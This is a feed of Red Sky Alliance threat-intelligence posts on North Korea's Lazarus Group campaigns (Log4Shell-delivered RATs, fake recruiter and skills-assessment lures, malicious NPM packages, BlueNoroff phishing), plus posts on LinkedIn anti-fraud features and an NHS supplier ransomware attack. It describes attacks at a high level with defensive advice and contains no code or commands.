lazarus - X-Industry - Red Sky Alliance2024-03-29T08:38:33Zhttps://redskyalliance.org/xindustry/feed/tag/lazarusLazarus Group Still Deploys Remote Access Trojanshttps://redskyalliance.org/xindustry/lazarus-group-still-deploys-remote-access-trojans2023-12-13T20:20:07.000Z2023-12-13T20:20:07.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p><a href="{{#staticFileLink}}12325907672,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12325907672,RESIZE_400x{{/staticFileLink}}" width="225" alt="12325907672?profile=RESIZE_400x" /></a>The North Korea-linked threat actor known as the Lazarus Group has been attributed to a new global campaign that involves the opportunistic exploitation of security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. Investigators are tracking the activity under the name Operation Blacksmith, noting the use of three DLang-based malware families, including a RAT called NineRAT that leverages Telegram for command-and-control (C2), DLRAT, and a downloader dubbed BottomLoader.</p>
<p>The researchers described the latest tactics of the adversary as a definitive shift and that they overlap with the cluster widely tracked as Andariel (aka Onyx Sleet or Silent Chollima), a sub-group within the Lazarus umbrella. Andariel is typically tasked with initial access, reconnaissance and establishing long term access for espionage in support of the North Korean government's national interests. Attack chains involve the exploitation of CVE-2021-44228 (aka Log4Shell) against publicly-accessible VMWare Horizon servers to deliver NineRAT. Some of the prominent sectors targeted include manufacturing, agriculture, and physical security.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-hackers-have-new-rats">https://redskyalliance.org/xindustry/lazarus-hackers-have-new-rats</a></p>
<p>The abuse of Log4Shell is not surprising given the fact that 2.8 percent of applications are still using vulnerable versions of the library (from 2.0-beta9 through 2.15.0) after two years of public disclosure, according to Veracode, with another 3.8% using Log4j 2.17.0, which, while not vulnerable to CVE-2021-44228, is susceptible to CVE-2021-44832.</p>
<p>NineRAT, first developed during May 2022, is said to have been put to use as early as March 2023 in an attack aimed at a South American agricultural organization, and then again in September 2023 on a European manufacturing entity. By using a legitimate messaging service like Telegram for C2 communications, the goal is to evade detection. The malware acts as the primary means of interaction with the infected endpoint, enabling the attackers to send commands to gather system information, upload files of interest, download additional files, and even uninstall and upgrade itself.<a href="#_ftn2">[2]</a></p>
<p>"Once NineRAT is activated it accepts preliminary commands from the telegram based C2 channel, to again fingerprint the infected systems. Re-fingerprinting of infected systems indicates that the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase," the researchers noted.</p>
<p>Also used in the attacks after initial reconnaissance is a custom proxy tool called HazyLoad that was previously identified by Microsoft as used by the threat actor as part of intrusions weaponizing critical security flaws in JetBrains TeamCity (CVE-2023-42793, CVSS score: 9.8). HazyLoad is downloaded and executed by means of another malware called BottomLoader.</p>
<p>Operation Blacksmith has been observed delivering DLRAT, which is both a downloader and a RAT equipped to perform system reconnaissance, deploy additional malware, and retrieve commands from the C2 and execute them in the compromised systems. DLRAT is another iteration in the Lazarus trend that started with MagicRAT, using exotic/uncommon languages and frameworks, along with modular malware in order to avoid detection. The multiple tools giving overlapping backdoor entry present Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access, the researchers said.</p>
<p>The exploitation of Log4Shell by Andariel is not new, for the hacking crew has used the vulnerability as an initial access vector in the past to deliver a remote access trojan referred to as EarlyRat. The disclosure comes as the AhnLab Security Emergency Response Center (ASEC) detailed Kimsuky's use of AutoIt versions of malware such as Amadey and RftRAT and distributing them via spear-phishing attacks bearing booby-trapped attachments and links in an attempt to bypass security products.</p>
<p>Kimusky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea's Reconnaissance General Bureau (RGB), which also houses the Lazarus Group. It was sanctioned by the US Treasury Department on 30 November 2023, for gathering intelligence to support the regime's strategic objectives. "After taking control of the infected system, to exfiltrate information, the Kimsuky group installs various malware such as keyloggers and tools for extracting accounts and cookies from web browsers," ASEC said in an analysis published recently.</p>
<p>It also follows the discovery of a new Konni-linked phishing campaign that uses a malicious executable file disguised as a Microsoft Word file to deliver a backdoor that "receives obfuscated commands from the threat actor and executes them in XML format."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p> </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p> </p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p> </p>
<p> </p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2023/12/lazarus-group-using-log4j-exploits-to.html">https://thehackernews.com/2023/12/lazarus-group-using-log4j-exploits-to.html</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/">https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/</a></p></div>Looking for a Real IT Job?https://redskyalliance.org/xindustry/looking-for-a-real-it-job2023-11-20T12:50:00.000Z2023-11-20T12:50:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12293636675,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12293636675,RESIZE_400x{{/staticFileLink}}" width="250" alt="12293636675?profile=RESIZE_400x" /></a>It is even more diabolical that cyber threat actors target job hunters. Especially those who are out of work and running behind in their bills. Recently, a sub-set within the infamous Lazarus Group has established new infrastructure that impersonates skills assessment portals as part of its social engineering campaigns. Lazarus Group also known by other names such as Guardians of Peace or Whois Team is a legal hacker group made up of an unknown number of individuals run by the government of North Korea. While not much is known about the Lazarus Group, Western researchers have attributed many cyberattacks to them between 2010 and 2021.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware">https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware</a></p>
<p>Researchers at Microsoft attributed the activity to a threat actor it calls Sapphire Sleet, describing it as a "shift in the persistent actor's tactics." Sapphire Sleet, also called APT38, BlueNoroff, CageyChameleon, and CryptoCore, has a track record of orchestrating cryptocurrency theft via social engineering. Recently, investigators implicated the threat actor to a new macOS malware family called ObjCShellz that's assessed to be a late-stage payload delivered in connection with another macOS malware known as RustBucket. "Sapphire Sleet typically finds targets on platforms like LinkedIn and uses lures related to skills assessment," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter). The threat actor then moves successful communications with targets to other platforms. A spokesman said past campaigns mounted by the hacking crew involved sending malicious attachments directly or embedding links to pages hosted on legitimate websites like GitHub.</p>
<p>Due to the quick detection and deletion of these payloads may have forced Sapphire Sleet to flesh out its own network of websites for malware distribution. "Several malicious domains and subdomains host these websites, which entice recruiters to register for an account," the company added. "The websites are password-protected to impede analysis."</p>
<p>While LinkedIn may be a hub of the business world, the platform's profile validation and identity protection features are lackluster. Fake job listings are created each day, tricking unsuspecting users into sharing information and potentially spending thousands of dollars on technology that will be shipped (and stolen). Here is a step-by-step process of how scammers are leveraging LinkedIn: </p>
<ol>
<li>A Fake Job Listing is Created: LinkedIn allows any user, regardless of the age of the account or its previous activity, to post a job as any company. Anyone with an internet connection and an email address can sign up for a LinkedIn account and post a job from Microsoft, Google, Facebook. LinkedIn's structure then links these entirely false job listings to the targeted company's official LinkedIn page a security oversight that the company has been aware of for years but have taken no action to remedy.</li>
<li>Fake Profiles of Real Team Members are Created: The scammers then create false lookalike profiles on social media platforms and messaging services by downloading public profile pictures of the targeted company's team members, spoofing their job titles and personal descriptions to fool anyone that is not deeply familiar with the company.</li>
<li>Scammers Steal Applicant Data and Technology: Once the scammers have someone "hooked" with a fake job offer they either email the applicant or start a chat on an encrypted messaging platform like Wire, telling the applicant to purchase high-end electronics like smartphones, tablets, and laptops that they will then be reimbursed for. Before reimbursement, the applicant must send in their devices to be "preloaded with software." That's when all communication with fake representatives from the company will disappear, with these bad actors getting away with a collection of pricey technology and moving on to their next victim.</li>
</ol>
<p>Source: <a href="https://thehackernews.com/2023/11/microsoft-warns-of-fake-skills.html">https://thehackernews.com/2023/11/microsoft-warns-of-fake-skills.html</a></p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941%C2%A0">https://www.linkedin.com/company/64265941 </a></li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p></div>Wanna Collab? Download this Malwarehttps://redskyalliance.org/xindustry/wanna-collab-download-this-malware2023-07-31T20:09:24.000Z2023-07-31T20:09:24.000ZJD Thomasonhttps://redskyalliance.org/members/JDThomason<div><p><a href="{{#staticFileLink}}12167935268,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12167935268,RESIZE_400x{{/staticFileLink}}" width="250" alt="12167935268?profile=RESIZE_400x" /></a>The Lazarus Group is North Korean state sponsored cybercrime group and they have been credited, in one way or another, with a recent social engineering campaign targeting developers on GitHub. They are said to have been created by the North Korean government as early as 2007 and they are a part of the RGB, which is North Korea’s primary foreign intelligence agency. “Lazarus Group” would appear to be the primary identity of the group, but they do have several aliases such as Appleworm, Group 77, Guardians of Peace, Hidden Cobra, Jade Sleet, among several others.</p>
<p>They target institutions in many areas, such as government, military, finance, manufacturing, publishing, among many others. Their typical tactics include cyber espionage, data theft, heists, destructive malware, and as we’ll see shortly, social engineering. They have been involved in a variety of malicious activities, such as the WannaCry 2.0 ransomware, which affected approximately 300,000 computers in at least 150 different countries, the 2014 attacks on Sony Pictures, and the theft of $81 million dollars from Bangladesh Bank in 2016.</p>
<p>The social engineering campaign we’re focusing on here is like another Lazarus campaign that took place in January of 2021, where cybersecurity researchers were targeted for collaborations on vulnerability exploit research and took advantage of malicious Visual Studio projects. Social engineering can be thought of as the process of manipulating, influencing, or deceiving someone to obtain something like private information, restricted access, or valuables. As they will generally require some form of communication between attacker and victim, social engineering attacks are built around how people typically think and behave. </p>
<p>The goals of social engineering attacks will typically be either sabotage or theft. Common types of social engineering attacks found in the digital world can include things like phishing, baiting, physical breaches like tailgating, or scareware like a malicious antivirus ad giving a false report.</p>
<p>The attack cycle of a social engineering attack will generally have four stages. First is preparation where information is gathered on an individual target or a target group. Next is infiltration, which is where communication is started and trust is built, Exploitation occurs when the target’s weaknesses and trust align in such a way that allows for an advancement of the attack. Then, the attacker will disengage once all of the required actions have been taken by the target.</p>
<p>GitHub released a security alert detailing the specifics of this campaign and its attack chain on July 18th. The threat actors begin by impersonating either developers or recruiters by utilizing accounts on GitHub and other social media sites. In some cases, the accounts were fake and in other cases the accounts were compromised. Fake accounts linked to this campaign have been found on LinkedIn, Slack, and Telegram</p>
<p>Developers are being targeted in blockchain, cryptocurrency, online gambling, and cyber security. After contact has been established, targets are invited into collaboration projects, which contain malicious NPM package dependencies. These packages act as first-stage downloaders, which download and execute secondary malware. The projects themselves seem to mostly involve either media players or cryptocurrency trading tools.</p>
<p>The first instances of the NPM usage pattern exhibited by this campaign were first discovered by Phylum research in June of 2023. They noted the sophistication of the technique as the execution order of the packages used is crucial to the success of the infection. The attack is spread across of pair of ordered NPM packages. The first package will fetch and store a token from a remote server, which is then used by a second package to obtain malicious code from a remote server.</p>
<p>In terms of mitigation, we can begin by noting that GitHub has listed a few indicators like domain names, malicious NPM packages, and malicious NPM accounts on their blog. The link to the mitigation blog post is here:</p>
<p><a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/</a></p>
<p>Anyone who was solicited by known malicious accounts are likely a target of this campaign. Repository invites can be reviewed in the GitHub security log. The events to look for are action:repo.add_member events, which indicate that you have accepted an invite to a repository. Think twice before accepting solicitations to collaborate on or install projects with NPM dependencies. Extra scrutiny should be given to new or recently published NPM dependencies or scripts that make network connections during installation. Anyone affected by these projects should inform their employers cybersecurity department, and it may also be prudent to reset or wipe affected devices, change account passwords, and rotate tokens stored on the affected devices.</p>
<p>In summary, the Lazarus Group is a North Korean state sponsored cyber crime group said to have been operating as early as 2007. They have several aliases like Jade Sleet and Guardians of Peace, and they operate in many areas like government, military, finance, among others.</p>
<p>Social engineering attacks aim to deceive someone in such a way that an attacker can obtain things like information or restricted access. Attacks like phishing or baiting are under the umbrella of social engineering, and a social engineering attack’s cycle will normally have four stages: preparation, infiltration, exploitation, and disengagement.</p>
<p>Developers on GitHub have been targeted in several different areas including blockchain, cryptocurrency, online gambling, and cyber security, for the purposes of collaborating on projects like media players or cryptocurrency trading tools. These can contain malicious NPM package dependencies, which act as first stage downloaders for additional malware.</p>
<p>Finally, we covered a few mitigation tips for this attack that were distributed by GitHub. They have a list of known malicious accounts listed on their blog, and anyone who has collaborated with these accounts is likely a target. Users can review their security logs on GitHub to see if they have been added to any suspicious projects. Users should also take extra care when examining the package dependencies and installation scripts of a project, particularly if newer NPM packages are involved.</p>
<p> </p>
<p><span style="font-size:8pt;">[1]: <a href="https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/">https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/</a></span></p>
<p><span style="font-size:8pt;">[2]: <a href="https://home.treasury.gov/news/press-releases/sm774">https://home.treasury.gov/news/press-releases/sm774</a></span></p>
<p><span style="font-size:8pt;">[3]: <a href="https://ofac.treasury.gov/recent-actions/20190913">https://ofac.treasury.gov/recent-actions/20190913</a></span></p>
<p><span style="font-size:8pt;">[4]: <a href="https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and</a></span></p>
<p><span style="font-size:8pt;">[5]: <a href="https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering">https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering</a></span></p>
<p><span style="font-size:8pt;">[6]: <a href="https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html">https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</a></span></p>
<p><span style="font-size:8pt;">[7]: <a href="https://www.imperva.com/learn/application-security/social-engineering-attack/">https://www.imperva.com/learn/application-security/social-engineering-attack/</a></span></p>
<p><span style="font-size:8pt;">[8]: <a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains</a></span></p>
<p><span style="font-size:8pt;">[9]: <a href="https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/">https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/</a></span></p>
<p> </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/ </li>
<li>Website: https://www. wapacklabs. com/ </li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a> </p></div>Lazarus Group has New Trickstershttps://redskyalliance.org/xindustry/lazarus-group-has-new-tricksters2022-12-31T14:10:00.000Z2022-12-31T14:10:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}10921669465,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10921669465,RESIZE_400x{{/staticFileLink}}" alt="10921669465?profile=RESIZE_400x" width="250" /></a>North Korea’s BlueNoroff hackers have updated their strategies and delivery techniques in a new wave of attacks targeting banks and venture capital firms according to cyber threat investigators. Part of Lazarus, a hacking group linked to the North Korean government, BlueNoroff is financially motivated and has been blamed for numerous cyber-attacks targeting banks, cryptocurrency firms, and other financial institutions.</p>
<p>The campaign by BlueNoroff has been in operation at least since 2017. It uses advanced phishing and social engineering techniques in order to abuse trust within companies. As such, threat actors study and analyze behaviors and interactions of employees to detect topics of interest.<a href="#_ftn1">[1]</a></p>
<p>After collecting the necessary data on the victims, they pretend to send what looks like a relevant and trustworthy email from one colleague to another, sharing a document or asking to review/answer questions about its contents. By including the logo of a third-party service Sendgrid, which offers user-tracking capabilities, the attacker knows exactly when the victim opens their email.</p>
<p>Alternatively, after hacking into an existing company, threat actors use its pathways such as email and social media to contact other firms and distribute weaponized documents in the form of investment contracts and similar files. Malicious actors then exploit the CVE-2017-0199 vulnerability in Microsoft Word.</p>
<p>Following several months of silence, the group has resumed its activities this fall with renewed attacks that leverage new malware, and updated delivery techniques that include new file types and a method of bypassing Microsoft’s Mark-of-the-Web (MotW) protections. Specifically, the hackers are distributing optical disk image (.iso) and virtual hard disk (.vhd) files containing decoy Office documents, which allows them to avoid the MotW warning that Windows typically displays when a user attempts to open a document downloaded from the internet. Relying on phishing, BlueNoroff is attempting to infect target organizations to intercept cryptocurrency transfers and drain accounts.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-targeting-cryptocurrency">https://redskyalliance.org/xindustry/lazarus-targeting-cryptocurrency</a></p>
<p>As part of the new campaign, the hacking group has registered an estimated seventy (70) fake domains mimicking well-known banks and venture capital firms, with a focus on Japanese firms. Organizations in UAE, US, and Vietnam are also targeted. These domains have been used for phishing attacks aimed at startup employees. The group also ‘adopted new techniques to convey the final payload’, including the use of Visual Basic Script and Windows Batch scripts, and the introduction of a new downloader to fetch the next stage payload.</p>
<p><a href="{{#staticFileLink}}10921669657,RESIZE_1200x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}10921669657,RESIZE_400x{{/staticFileLink}}" alt="10921669657?profile=RESIZE_400x" width="400" /></a></p>
<p>In September 2022, a victim in UAE was targeted with a malicious Office document designed to connect to a remote server and download a payload named ieinstal.exe, which helped bypass the User Access Control (UAC) protections. After the infection, the threat actor used the backdoor to perform keyboard hands-on activities such as fingerprinting and the installation of additional malware with high privileges.</p>
<p>In another attack, the group was observed using a downloader that checks the system for antivirus programs from Avast, Avira, Bitdefender, Kaspersky, Microsoft, Sophos, and Trend Micro, to disable them. BlueNoroff was also observed exploiting Living-of-the-Land binaries (LOLBins) and using various scripts to display a decoy document and fetch the next-stage payload, as well as using a new Windows executable-type downloader that creates a fake password file and downloads a payload.</p>
<p>As part of the campaign, the hackers also used fake domains for hosting malicious documents and payloads, and fake domains imitating legitimate financial and investment companies, most of which are Japanese organizations. Lately, the group also targeted cryptocurrency-related businesses. This threat actor has introduced slight modifications to deliver their malware. This also suggests that attacks by this group are unlikely to decrease in the near future.</p>
<p>Organizations are advised to train their employees on phishing, perform a network audit to identify vulnerabilities and weaknesses, and deploy and maintain security solutions that offer endpoint protection and threat detection and response capabilities.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/ </li>
<li>Website: https://www. wapacklabs. com/ </li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/north-korean-hackers-created-70-fake-bank-venture-capital-firm-domains">https://www.securityweek.com/north-korean-hackers-created-70-fake-bank-venture-capital-firm-domains</a></p></div>Updated LinkedIn Security Features Targeting Fraudulent Accountshttps://redskyalliance.org/xindustry/updated-linkedin-security-features-targeting-fraudulent-accounts2022-10-27T20:32:14.000Z2022-10-27T20:32:14.000ZJD Thomasonhttps://redskyalliance.org/members/JDThomason<div><p><a href="{{#staticFileLink}}10856609287,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10856609287,RESIZE_400x{{/staticFileLink}}" width="250" alt="10856609287?profile=RESIZE_400x" /></a>LinkedIn has become a popular destination for threat actors trying to communicate with people for a variety of purposes, such as distributing malware, cyberespionage, credential stealing, financial fraud, etc. One common approach to using LinkedIn by cyber criminals is to approach people using fake profile claiming to be a recruiter working at technology, defense, or media companies. The North Korean-sponsored group Lazarus often engaged in these kinds of activities in order to propagate malware [1].</p>
<p>In an effort to mitigate some of these schemes, LinkedIn is beginning to implement a number of security features with the hope that utilizing fake profiles will be less effective for instigating attacks. A summary of the changes is that they will start displaying more information about profiles to users, actively seek out fake profiles with AI, and warn users about suspicious messages. In terms of how LinkedIn is showing more information to users, they are adding an “about this profile” feature to user profiles [2]. A glimpse of this can be seen below in Figure 1. This feature shows when a profile was first created, when it was last updated, and whether the user has verified a phone number and/or work email. This can be valuable information to have when deciding if you should consider communicating with others through LinkedIn.</p>
<p><a href="{{#staticFileLink}}10856609263,original{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10856609263,RESIZE_710x{{/staticFileLink}}" width="600" alt="10856609263?profile=RESIZE_710x" /></a></p>
<p style="text-align:center;"><em>Figure 1. Showing the new “About this profile” section (source: LinkedIn)</em></p>
<p>In addition to the added information being shown about profiles, LinkedIn is also taking note of the remarkable improvements in AI generated imagery and are developing deep learning models to detect such images. Setting aside the current ethical and legal controversies currently surrounding AI imagery, using AI generated images can make fake profiles appear more legitimate. LinkedIn’s new models will be checking profile photos for image artifacts associated with these types of images in an attempt to identify potentially fake profiles [2].</p>
<p>Another change that is taking place is the addition of warnings to LinkedIn messages. Specifically, users will now begin to see warnings if messages contain content that has been deemed high-risk [2]. For example, a user may see warnings in messages that appear to be trying to move the conversation to an external site. An example message can be seen below in Figure 2. There are certainly other “high-risk” aspects of nefarious messages that may receive warnings but attempting to lure a user a way from LinkedIn is worthy of note here because that is a common tactic in many cases of attack, especially since distributing files is often needed to execute an attack. With the Lazarus attack mentioned previously, threat actors would attempt to lure users into WhatsApp for malware delivery [1]. These changes also include the ability to report messages or mark them as safe.</p>
<p><a href="{{#staticFileLink}}10856608491,RESIZE_1200x{{/staticFileLink}}"><img class="align-center" src="{{#staticFileLink}}10856608491,RESIZE_710x{{/staticFileLink}}" width="600" alt="10856608491?profile=RESIZE_710x" /></a></p>
<p style="text-align:center;"><em>Figure 2. LinkedIn message with warning (source: LinkedIn)</em></p>
<p>In summary, LinkedIn is looking to cut down fraudulent activity on its platform by implementing a few security updates. These updates are:</p>
<ul>
<li>A new “about this profile” feature, which allows users to see more information about a profile, such as when it was created and last updated.</li>
<li>Using deep learning models to identify potentially fake profiles through their profile images.</li>
<li>Implementing a warning system in LinkedIn messages so users can be more aware of potentially dangerous messages.</li>
</ul>
<p>Even with these updates, it is important for users to keep in mind a few warning signs that may indicate fraudulent activity. Thus, users should consider reporting users if they are seeing any of this behavior [3]:</p>
<ul>
<li>Asking for money, cryptocurrency, or gift cards.</li>
<li>Posting jobs that seem too good to be true, or jobs that require upfront payments.</li>
<li>Sending messages with romantic gestures or bad grammar.</li>
<li>Profiles with abnormal profile images or incomplete work history</li>
<li>Profiles with no connections in common</li>
</ul>
<p> </p>
<p><strong>[1]: <a href="https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/">https://www.bleepingcomputer.com/news/security/microsoft-lazarus-hackers-are-weaponizing-open-source-software/</a></strong></p>
<p><strong>[2]: <a href="https://blog.linkedin.com/2022/october/25/new-linkedin-profile-features-help-verify-identity--detect-and-r">https://blog.linkedin.com/2022/october/25/new-linkedin-profile-features-help-verify-identity--detect-and-r</a></strong></p>
<p><strong>[3]: <a href="https://blog.linkedin.com/2022/june/16/working-together-to-keep-linkedin-safe">https://blog.linkedin.com/2022/june/16/working-together-to-keep-linkedin-safe</a></strong></p>
<p> </p>
<p><strong>About Red Sky Alliance</strong></p>
<p>Red Sky Alliance is in New Boston, NH USA. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/"><strong>https://www.redskyalliance.org/</strong></a></li>
<li>Website: <a href="https://www.wapacklabs.com/"><strong>https://www.wapacklabs.com/</strong></a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941"><strong>https://www.linkedin.com/company/64265941</strong></a></li>
</ul>
<p> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989"><strong>https://attendee.gotowebinar.com/register/5504229295967742989</strong></a></p></div>Weekly Cyber Intel Report - All Sector 10 21 2022https://redskyalliance.org/xindustry/weekly-cyber-intel-report-all-sector-10-21-20222022-10-21T12:15:00.000Z2022-10-21T12:15:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><span style="font-size:12pt;"><a href="{{#staticFileLink}}10846789675,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10846789675,RESIZE_400x{{/staticFileLink}}" width="250" alt="10846789675?profile=RESIZE_400x" /></a>Activity Summary - Week Ending on 21 October 2022:</span></h2>
<ul>
<li>Red Sky Alliance identified 32,517 connections from new IP’s checking in with our Sinkholes</li>
<li>NoVa hit 17x</li>
<li>Analysts identified 1,515 new IP addresses participating in various Botnets</li>
<li>“Alchimist” Attack</li>
<li>REvil</li>
<li>Good News from Brazil</li>
<li>Khan Academy</li>
<li>Vinomofo</li>
<li>Japanese Crypto Funds</li>
<li>Oh Canada</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}10846789464,original{{/staticFileLink}}">IR-22-295-001_weekly295.pdf</a></p></div>NHS Under Constant Attackhttps://redskyalliance.org/xindustry/nhs-under-constant-attack2022-08-11T13:44:06.000Z2022-08-11T13:44:06.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}10761543869,RESIZE_930x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10761543869,RESIZE_400x{{/staticFileLink}}" width="250" alt="10761543869?profile=RESIZE_400x" /></a>There was once an unwritten moral code among cyber hackers that they would never attack vulnerable businesses like health care. Well, those disingenuous hacker ethics are out the door; have been for awhile. After dealing with the hack of the UK’s NHS controlled ambulance service last week<a href="#_ftn1">[1]</a>, malicious hackers are now holding an IT firm that supplies NHS ‘trusts’ to ransom following a cyber-attack. NHS trusts are public sector bodies established by parliamentary order through the UK Secretary of State for health to provide healthcare services to the NHS. They have a board of executive and non-executive directors and are accountable to the secretary of state. Health administrators are concerned criminals have access to confidential health records and could leak them if their demands are not met. The software company Advanced, which provides patient data to dozens of trusts and most NHS 111 providers in England, which was hacked last week.</p>
<p>Call handlers across 85% of the UK are still without a crucial IT system and have had to resort to using pen and paper for the past week. Agencies including the National Crime Agency and GCHQ are now investigating the data breach. A reliable source said the attackers have made 'some demands', according to the Health Service Journal, although it is not entirely clear what they are. Some analyst believe there is a theory cyber criminals are looking for payments in exchange for not leaking information and removing the malware.<a href="#_ftn2">[2]</a></p>
<p>Advanced's Adastra software, one of the systems that was attacked and is used by NHS 111, covers 40million patients, according to the company. Affected NHS 111 call handlers currently do not have access to the GP records or NHS numbers of people ringing the non-emergency service. They are also unable to make electronic bookings with GPs or send out ambulances for patients while the Adastra software is still offline. </p>
<p>The criminal hackers also attacked the company's Carenotes EPR software, which holds mental health records. Affected mental health trusts warned staff are currently facing a 'pretty desperate' situation, still unable to access vital patient records. Mental health records and patients' unique NHS numbers are allegedly to have been affected in the attack.</p>
<p>An Advanced spokesperson said: 'With respect to potentially impacted data, our investigation is under way. 'When we have more information about potential data access or exfiltration, we will update customers as appropriate.' Affected mental health trusts warned staff are currently facing a 'pretty desperate' situation, still unable to access vital patient records. One mental health trust chief executive, who preferred to stay anonymous, told the HSJ: 'It’s really difficult and the longer it goes on, the harder it gets for staff.'</p>
